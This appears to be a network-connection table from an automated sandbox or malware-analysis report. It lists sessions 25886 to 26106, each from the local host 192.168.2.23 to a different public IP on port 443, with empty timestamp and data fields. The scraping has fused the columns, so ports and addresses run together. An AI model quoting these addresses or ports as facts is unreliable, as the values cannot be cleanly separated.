                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25886192.168.2.2347330175.165.143.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25887192.168.2.233450498.114.105.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25888192.168.2.2354340209.127.212.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25889192.168.2.234433265.201.229.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25890192.168.2.234226868.26.205.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25891192.168.2.2334010109.247.1.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25892192.168.2.235676414.200.145.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25893192.168.2.2353330121.59.14.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25894192.168.2.2360770207.165.4.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25895192.168.2.234129438.43.87.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25896192.168.2.234826090.67.131.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25897192.168.2.2334834156.225.64.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25898192.168.2.2353420102.114.130.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25899192.168.2.235529254.113.130.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25900192.168.2.23538265.248.26.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25901192.168.2.234407867.55.208.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25902192.168.2.2340970208.53.92.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25903192.168.2.234906832.228.8.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25904192.168.2.233656089.241.129.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25905192.168.2.2336102119.148.215.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25906192.168.2.235074483.33.81.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25907192.168.2.2354696148.59.145.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25908192.168.2.2345424175.55.20.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25909192.168.2.2342614157.134.102.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25910192.168.2.2351092107.27.207.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25911192.168.2.2340228207.232.202.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25912192.168.2.2334176201.57.221.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25913192.168.2.2358994202.30.118.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25914192.168.2.233382091.233.52.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25915192.168.2.234464287.64.103.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25916192.168.2.235424652.103.86.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25917192.168.2.2343904149.173.115.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25918192.168.2.235568242.151.148.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25919192.168.2.2360988181.16.108.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25920192.168.2.234844263.104.115.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25921192.168.2.234326614.237.53.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25922192.168.2.2342404114.129.61.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25923192.168.2.234957623.58.76.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25924192.168.2.23474341.69.121.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25925192.168.2.2352310206.37.220.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25926192.168.2.2335230223.184.43.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25927192.168.2.2348830159.78.141.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25928192.168.2.2344482113.85.249.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25929192.168.2.2344368112.12.111.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25930192.168.2.2342406117.194.155.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25931192.168.2.235234860.72.253.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25932192.168.2.2360258101.178.77.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25933192.168.2.2342700131.41.29.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25934192.168.2.234237846.156.139.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25935192.168.2.2356044193.242.19.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25936192.168.2.235913872.127.79.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25937192.168.2.235725887.3.48.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25938192.168.2.2354764130.209.88.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25939192.168.2.2353442187.244.73.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25940192.168.2.2355784203.81.87.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25941192.168.2.233593858.8.18.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25942192.168.2.2338132209.251.95.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25943192.168.2.234556095.227.175.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25944192.168.2.233348637.71.83.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25945192.168.2.2357940106.216.215.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25946192.168.2.2341646220.248.192.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25947192.168.2.235928841.163.114.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25948192.168.2.2350956117.210.196.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25949192.168.2.2359862162.203.211.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25950192.168.2.2339450144.215.35.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25951192.168.2.235802697.214.246.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25952192.168.2.234318889.63.23.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25953192.168.2.235319449.37.27.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25954192.168.2.2358280115.56.169.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25955192.168.2.234907678.187.126.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25956192.168.2.234452644.106.4.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25957192.168.2.2354490110.143.22.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25958192.168.2.235993665.254.61.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25959192.168.2.2359528121.71.58.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25960192.168.2.2352262166.44.51.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25961192.168.2.23486584.53.72.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25962192.168.2.2350344198.67.18.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25963192.168.2.2347922131.187.75.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25964192.168.2.2348636174.194.175.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25965192.168.2.2340130200.191.200.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25966192.168.2.234311259.21.139.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25967192.168.2.234021895.32.75.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25968192.168.2.23530005.97.248.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25969192.168.2.233505683.113.46.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25970192.168.2.2356502144.43.242.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25971192.168.2.234523617.182.15.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25972192.168.2.235763424.102.213.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25973192.168.2.234282067.100.30.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25974192.168.2.2338954189.40.48.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25975192.168.2.23554085.243.10.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25976192.168.2.2359792138.35.223.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25977192.168.2.2338478174.253.59.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25978192.168.2.234824868.143.173.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25979192.168.2.235842292.77.135.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25980192.168.2.2350074165.154.84.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25981192.168.2.2342658145.107.189.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25982192.168.2.2350154196.183.40.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25983192.168.2.2352450140.180.87.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25984192.168.2.2347418141.161.114.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25985192.168.2.2340886115.243.222.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25986192.168.2.235771634.147.26.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25987192.168.2.2343036110.30.159.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25988192.168.2.2333620217.173.3.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25989192.168.2.233685431.177.17.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25990192.168.2.235214279.187.39.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25991192.168.2.2344114161.106.225.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25992192.168.2.2335400115.20.106.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25993192.168.2.2341946151.69.78.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25994192.168.2.235580868.30.213.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25995192.168.2.2345042209.26.158.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25996192.168.2.2355178216.136.208.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25997192.168.2.2346936126.25.66.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25998192.168.2.2336636142.178.181.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25999192.168.2.2344430159.149.248.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26000192.168.2.235299049.140.122.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26001192.168.2.2337468181.240.151.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26002192.168.2.2347340103.65.251.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26003192.168.2.2355160191.156.120.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26004192.168.2.2336548191.68.16.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26005192.168.2.234056232.52.31.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26006192.168.2.2337584101.69.212.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26007192.168.2.233302060.117.206.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26008192.168.2.2357162132.52.158.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26009192.168.2.234050094.241.238.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26010192.168.2.2334832137.94.94.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26011192.168.2.234589269.20.95.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26012192.168.2.233573461.185.139.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26013192.168.2.235865036.196.31.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26014192.168.2.2337844202.94.147.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26015192.168.2.2352840191.203.88.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26016192.168.2.2346660135.6.192.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26017192.168.2.2360840107.129.205.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26018192.168.2.235464219.51.50.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26019192.168.2.2359664103.6.238.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26020192.168.2.235744440.187.20.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26021192.168.2.236085241.81.238.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26022192.168.2.2334060186.228.48.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26023192.168.2.2356832135.186.65.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26024192.168.2.235895440.31.191.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26025192.168.2.23548501.8.75.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26026192.168.2.2350952131.218.64.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26027192.168.2.235715099.124.113.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26028192.168.2.2341114179.123.185.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26029192.168.2.2356500205.83.59.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26030192.168.2.2341320147.144.168.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26031192.168.2.2357094204.62.90.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26032192.168.2.2337400223.109.173.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26033192.168.2.2335130151.59.156.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26034192.168.2.2353600126.7.143.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26035192.168.2.2357104196.104.141.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26036192.168.2.235314498.232.32.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26037192.168.2.235949078.226.56.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26038192.168.2.2334002207.31.43.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26039192.168.2.2334606202.113.175.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26040192.168.2.2354836171.110.47.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26041192.168.2.234404057.84.17.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26042192.168.2.235523881.76.123.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26043192.168.2.2345920199.139.110.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26044192.168.2.235270870.224.147.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26045192.168.2.2352786204.87.1.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26046192.168.2.2356286190.253.253.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26047192.168.2.2341038118.178.234.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26048192.168.2.2339358213.162.193.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26049192.168.2.234970696.82.76.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26050192.168.2.2340238139.214.190.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26051192.168.2.2333202108.152.39.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26052192.168.2.2340184131.20.82.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26053192.168.2.2332928184.16.4.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26054192.168.2.2360620220.191.178.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26055192.168.2.2343010197.221.131.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26056192.168.2.23489842.239.227.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26057192.168.2.233957269.249.13.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26058192.168.2.235070035.249.189.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26059192.168.2.2352782161.245.185.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26060192.168.2.2350346223.85.49.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26061192.168.2.234906464.219.252.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26062192.168.2.233653024.103.17.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26063192.168.2.234410242.9.155.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26064192.168.2.235689281.119.29.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26065192.168.2.2340112152.52.127.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26066192.168.2.2350940126.134.48.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26067192.168.2.2342976141.49.150.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26068192.168.2.2350118128.105.76.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26069192.168.2.235253072.9.119.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26070192.168.2.2342388153.211.193.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26071192.168.2.234233698.229.22.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26072192.168.2.2342594201.116.29.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26073192.168.2.2340560104.137.173.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26074192.168.2.2347962199.26.235.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26075192.168.2.2342940120.92.189.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26076192.168.2.2355512123.55.0.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26077192.168.2.233383274.29.15.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26078192.168.2.234218627.87.163.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26079192.168.2.2336218178.50.161.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26080192.168.2.2336880181.236.169.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26081192.168.2.2342526157.63.170.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26082192.168.2.2358218147.146.243.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26083192.168.2.2355342151.108.39.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26084192.168.2.2347574156.97.58.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26085192.168.2.2336218139.49.29.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26086192.168.2.2349522126.194.237.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26087192.168.2.2354792181.253.55.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26088192.168.2.234754079.126.174.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26089192.168.2.2337270217.6.96.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26090192.168.2.2357132158.227.41.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26091192.168.2.2353332113.143.91.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26092192.168.2.2355342211.2.168.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26093192.168.2.235735636.191.135.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26094192.168.2.2353164156.196.48.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26095192.168.2.236047260.229.49.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26096192.168.2.2351760169.69.48.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26097192.168.2.2338388123.124.30.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26098192.168.2.2336374159.63.111.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26099192.168.2.2338406114.123.146.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26100192.168.2.235446478.55.106.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26101192.168.2.2358996164.62.218.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26102192.168.2.235710635.10.5.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26103192.168.2.2354240219.34.197.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26104192.168.2.2344532216.85.253.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26105192.168.2.2338200160.253.128.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            26106192.168.2.235856489.186.60.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
